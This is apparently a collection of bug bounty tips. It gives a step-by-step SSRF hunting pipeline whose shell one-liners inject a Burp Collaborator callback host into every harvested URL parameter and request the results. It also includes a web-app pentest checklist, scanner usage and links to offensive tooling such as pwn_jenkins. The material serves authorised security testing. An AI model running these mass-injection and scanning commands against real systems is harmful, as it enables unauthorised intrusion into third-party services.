🤑Bug Bounty Tips for SSRF🤑

Step 1: Subdomain Enumeration

•DNS Dumpster
•Sublist3r
•Amass
•Google Dorking
•Certificate Transparency Logs
•subdomainer

Step 2: Find Live Domains

cat all-domains.txt | httpx > all-live.txt

Step 3: Identify All URLs

cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,noscript -o allUrls.txt

Step 4: Injection Burp Collaborator URL in Parameters

cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt

Step 5: Test for SSRF Vulnerabilities

cat ssrf.txt | httpx -fr

Step 6: How to check which URL is vulnerable

split -l 10 ssrf.txt output_file_

🔴Easy Open Redirect in 10 min🔴

🌟Subdomain Takeover Methodology🌟

🤑Bug Bounty VPS Setup🤑

Bug Hunting Autopilot VPS by Om Arora
https://lnkd.in/dkhvZ54t

Setup Bug Bounty Automation by sm4rty
https://lnkd.in/dRW3yX32

VPS Bug Bounty Tools by drak3shift7
https://lnkd.in/dbVwcveD

Setup DigitalOcean VPS to Bug Bounty by SimbaTech
https://lnkd.in/dse2BhkE

Using VPS for Bug Bounty, comparing VPS providers
https://lnkd.in/dZUtg3Hr

Bug Bounty Tools config in VPS by Iheb Hamad
https://lnkd.in/d42rqzwW

Beginners Guide: VPS Setup for Bug Bounty Recon Automation
https://lnkd.in/dxeEAYxJ

Notification system for your Bug Bounty Automation by Ranjan Kumar
https://lnkd.in/djfBqR-4

Emissary Tool (Send notifications via different channels such as Slack, Telegram or Teams in your bug bounty flow) by BountyStrike
https://lnkd.in/dX-aGhRw

SSRF! : Get notified on discord whenever you have an SSRF by a1bi_n_
https://lnkd.in/dsVsj_qq

📥 https://github.com/gquere/pwn_jenkins

🚨Web Pentesting Checklist by Ott3rly 🚨

- API docs/support pages. Explore functionality to understand the app better.
- Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them.
- Register functionality. IDORS, unexpiring tokens, reused tokens,
- Password reset.
- 2FA.
- User Management (auth model). Try to build RBAC matrix.
- My profile section.
- User invites
- See if inviting an existing user to your org exposes their name
- See if inviting an existing user removes them from their own org
- User management
- Customer data
- Look for JS, ctrl+f and try to find /admin /api and etc.
- Look for API
- If an endpoint has api/v2/, try api/v1/
- Undocumented API Calls and Admin tools
- Upload functions
- Integration functions
- Look for subdomains, don't hack on them since they will be OOS, but try to find the way to to elavate it to your main target.
- If you find a bug that's OOS, still ask the customer if they care

Cart section
- Integer overflow
- Business logic errors (-1 number of items)
- Rate limit on coupon
- Race condition on coupon
- Any interesting parameters

Giftcards
- Any interesting parameters
- Race condition
- Reflected XSS
- API endpoint enumeration

Intercom
- Intercom('show');
- Intercom('boot',{email:'known_user@gmail.com'})

🚨afrog - A Security Tool for Bug Bounty, Pentest and Red Teaming🚨

📥Download - https://github.com/zan8in/afrog/

👉Usage -

✅afrog -T urls.txt -S high,critical,medium -o result.html

✅afrog -t https://example.com -S high,critical

🌟use xargs with gau to scan bulk domains without losing speed🌟

👉Command

xargs -a alive.txt -I@ sh -c 'gau --blacklist css,jpg,jpeg,JPEG,ott,noscript,js,ttf,png,woff2,woff,eot,gif "@"' | tee -a gau.txt